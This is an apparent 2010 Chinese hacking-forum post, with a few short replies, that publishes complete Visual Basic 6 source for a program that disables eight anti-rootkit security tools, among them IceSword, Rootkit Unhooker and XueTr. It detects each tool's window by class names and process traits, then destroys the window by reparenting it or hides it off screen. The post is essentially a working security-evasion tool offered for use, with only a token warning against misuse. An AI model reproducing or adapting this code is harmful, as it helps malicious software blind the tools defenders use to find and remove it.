[半原创]窗口攻击废除ARK功能 - TaAttackWindow(AARK)
本帖最后由 HoviDelphic 于 2010-5-2 11:04 编辑在学校上不了网真是不爽啊,今天回家终于能上网了!
很多ARK都有很强的进程自我保护,很可惜,让ARK无法使用根本无需结束进程,直接搞窗口就行了。
我无聊时写了个无聊的程序,能使8个ARK无法工作。
提供完整代码,希望大家不要拿去做坏事。
Module1.bas
Option Explicit
Public Declare Function EnumWindows Lib "user32" (ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
Public Declare Function SetParent Lib "user32.dll" (ByVal hWndChild As Long, ByVal hWndNewParent As Long) As Long
Public Declare Function FindWindowEx Lib "user32.dll" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Public Declare Function GetForegroundWindow Lib "user32.dll" () As Long
Public Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Declare Function GetClassName Lib "user32.dll" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
Public Declare Function GetWindowTextLength Lib "user32.dll" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Long
Public Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
Public Declare Function MoveWindow Lib "user32.dll" (ByVal hwnd As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal bRepaint As Long) As Long
Public Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Dim GetPid As Long
Private Function EnumWindowsProc(ByVal hwnd As Long, ByVal lParam As Long) As Long
Dim hWnd1, hWnd2 As Long
hWnd1 = FindWindowEx(hwnd, 0, "AfxMDIFrame42s", vbNullString) '冰刃的两个特征
hWnd2 = FindWindowEx(hwnd, 0, "AfxControlBar42s", vbNullString)
If hWnd1 <> 0 And hWnd2 <> 0 Then
GetWindowThreadProcessId hwnd, GetPid
End If
EnumWindowsProc = True
End Function
Public Function FindIceSwordPid() As Long
EnumWindows AddressOf EnumWindowsProc, 0
FindIceSwordPid = GetPid
End Function
Form1.frm
Option Explicit
Private Sub KillWnd(ByVal WindowHandle As Long)
Load Form2
SetParent WindowHandle, Form2.hwnd
Unload Form2
End Sub
Private Sub Command1_Click()
Timer1.Enabled = True
Timer2.Enabled = True
Timer3.Enabled = True
Timer4.Enabled = True
Timer5.Enabled = True
Timer6.Enabled = True
Timer7.Enabled = True
Timer8.Enabled = True
End Sub
'Anti IceLight
Private Sub Timer1_Timer()
Dim bkHwnd As Long, slen As Long, r As Long, RetVal As Long, hd0 As Long, hd8 As Long
Dim tstr As String, lpClassName As String
bkHwnd = GetForegroundWindow()
If bkHwnd <> 0 Then
slen = GetWindowTextLength(bkHwnd) '获取窗口标题文本长度
tstr = String$(slen, 0)
r = GetWindowText(bkHwnd, tstr, slen + 1) '获取窗口标题
lpClassName = Space(256)
RetVal = GetClassName(bkHwnd, lpClassName, 256)
lpClassName = Left$(lpClassName, RetVal)
If tstr = "" And lpClassName = "ThunderRT6FormDC" Then
hd8 = FindWindowEx(bkHwnd, 0, "ThunderRT6UserControlDC", vbNullString) ': MsgBox Hex(hd8)
hd0 = FindWindowEx(bkHwnd, 0, "ThunderRT6PictureBoxDC", vbNullString) ': MsgBox Hex(hd0)
If hd8 <> 0 And hd0 <> 0 Then
KillWnd bkHwnd
'Timer1.Enabled = False
End If
End If
End If
End Sub
'Anti PsNull
Private Sub Timer2_Timer()
Dim bkHwnd As Long, slen As Long, r As Long, RetVal As Long, itsPID As Long, itsTID As Long, hd1 As Long, hd3 As Long
Dim tstr As String, lpClassName As String
bkHwnd = GetForegroundWindow() ': MsgBox Hex(bkHwnd)
If bkHwnd <> 0 Then
slen = GetWindowTextLength(bkHwnd) '获取窗口标题文本长度
tstr = String$(slen, 0)
r = GetWindowText(bkHwnd, tstr, slen + 1) '获取窗口标题
lpClassName = Space(256)
RetVal = GetClassName(bkHwnd, lpClassName, 256)
lpClassName = Left$(lpClassName, RetVal) ': MsgBox lpClassName
itsTID = GetWindowThreadProcessId(bkHwnd, itsPID)
If tstr <> "" And lpClassName = "ThunderRT6Form" And itsPID = 0 And itsTID = 0 Then
hd1 = FindWindowEx(bkHwnd, 0, "SysListView32", vbNullString) ': MsgBox Hex(hd1)
hd3 = FindWindowEx(bkHwnd, 0, "SysTabControl32", vbNullString) ': MsgBox Hex(hd3)
If hd1 <> 0 And hd3 <> 0 Then
KillWnd bkHwnd
'Timer2.Enabled = False
End If
End If
End If
End Sub
'Anti Rootkit Unhooker
Private Sub Timer3_Timer()
Dim bkHwnd As Long, slen As Long, r As Long, RetVal As Long, itsPID As Long, itsTID As Long, hd1 As Long
Dim tstr As String, lpClassName As String
bkHwnd = GetForegroundWindow() ': MsgBox Hex(bkHwnd)
If bkHwnd <> 0 Then
slen = GetWindowTextLength(bkHwnd) '获取窗口标题文本长度
tstr = String$(slen, 0)
r = GetWindowText(bkHwnd, tstr, slen + 1) '获取窗口标题
lpClassName = Space(256)
RetVal = GetClassName(bkHwnd, lpClassName, 256)
lpClassName = Left$(lpClassName, RetVal) ': MsgBox lpClassName
itsTID = GetWindowThreadProcessId(bkHwnd, itsPID) ': MsgBox itsPID, , itsTID
If tstr = "" And lpClassName <> "" And itsPID <> 0 And itsTID <> 0 Then
hd1 = OpenProcess(1, 0, itsPID)
If hd1 <= 0 Then
KillWnd bkHwnd
'Timer3.Enabled = False
End If
End If
End If
End Sub
'Anti IceSword
Private Sub Timer4_Timer()
Dim IsPID As Long, bkHwnd As Long, bkPID As Long
IsPID = FindIceSwordPid
bkHwnd = GetForegroundWindow() ': MsgBox Hex(bkHwnd)
GetWindowThreadProcessId bkHwnd, bkPID
If bkPID = IsPID Then
KillWnd bkHwnd
'Timer4.Enabled = False
End If
End Sub
'Anti SnipeSword
Private Sub Timer5_Timer()
Dim bkHwnd As Long, slen As Long, r As Long, RetVal As Long, itsPID As Long, itsTID As Long, hd1 As Long
Dim tstr As String, lpClassName As String
bkHwnd = GetForegroundWindow() ': MsgBox Hex(bkHwnd)
If bkHwnd <> 0 Then
slen = GetWindowTextLength(bkHwnd) '获取窗口标题文本长度
tstr = String$(slen, 0)
r = GetWindowText(bkHwnd, tstr, slen + 1) '获取窗口标题
lpClassName = Space(256)
RetVal = GetClassName(bkHwnd, lpClassName, 256)
lpClassName = Left$(lpClassName, RetVal) ': MsgBox lpClassName
If InStr(1, tstr, "狙剑") <> 0 And lpClassName = "ClientWindow" Then
itsTID = GetWindowThreadProcessId(bkHwnd, itsPID) ': MsgBox itsPID, , itsTID
hd1 = OpenProcess(1, 0, itsPID)
If hd1 < 0 Then
KillWnd bkHwnd
'Timer5.Enabled = False
End If
End If
End If
End Sub
'Anti WSysCheck
Private Sub Timer6_Timer()
Dim bkHwnd As Long, slen As Long, r As Long, RetVal As Long, hd0 As Long, hd8 As Long
Dim tstr As String, lpClassName As String
bkHwnd = GetForegroundWindow()
If bkHwnd <> 0 Then
slen = GetWindowTextLength(bkHwnd) '获取窗口标题文本长度
tstr = String$(slen, 0)
r = GetWindowText(bkHwnd, tstr, slen + 1) '获取窗口标题
lpClassName = Space(256)
RetVal = GetClassName(bkHwnd, lpClassName, 256)
lpClassName = Left$(lpClassName, RetVal)
If tstr <> "" And lpClassName <> "" Then
hd8 = FindWindowEx(bkHwnd, 0, "TPageControl", vbNullString) ': MsgBox Hex(hd8)
hd0 = FindWindowEx(bkHwnd, 0, "TStatusBar", vbNullString) ': MsgBox Hex(hd0)
If hd8 <> 0 And hd0 <> 0 Then
KillWnd bkHwnd
'Timer6.Enabled = False
End If
End If
End If
End Sub
'Anti XueTr
Private Sub Timer7_Timer()
Dim bkHwnd As Long, slen As Long, r As Long, RetVal As Long, itsPID As Long, itsTID As Long
Dim tstr As String, lpClassName As String
bkHwnd = GetForegroundWindow()
If bkHwnd <> 0 Then
slen = GetWindowTextLength(bkHwnd) '获取窗口标题文本长度
tstr = String$(slen, 0)
r = GetWindowText(bkHwnd, tstr, slen + 1) '获取窗口标题
lpClassName = Space(256)
RetVal = GetClassName(bkHwnd, lpClassName, 256)
lpClassName = Left$(lpClassName, RetVal)
If tstr <> "" And lpClassName = "#32770" Then
itsTID = GetWindowThreadProcessId(bkHwnd, itsPID) ': MsgBox itsPID, , itsTID
If itsPID = 0 And itsTID = 0 Then
MoveWindow bkHwnd, -10000, -10000, 1, 1, 1
'Timer6.Enabled = False
End If
End If
End If
End Sub
'Anti TY(天琊)
Private Sub Timer8_Timer()
Dim bkHwnd As Long, i As Long, itsPID As Long
bkHwnd = GetForegroundWindow()
If bkHwnd = 0 Then 'TY存在,否则无论何时此值都不会为零
For i = 10000 To &H999999
Call GetWindowThreadProcessId(i, itsPID)
If itsPID = 0 Then
MoveWindow i, -10000, -10000, 1, 1, 0
End If
Next
'Timer8.Enabled = False
End If
End Sub
Form2.frm
'No code
相信大家能写出比这个更好的代码。 欢迎TA回来!
呵呵。。。 welcome! 呵呵,最近比较忙,没时间上网,HD那个号还是在管理时才使用吧。 围观楼上SYF大牛。 围观,谁叫你们都写牛X!~···
页:
[1]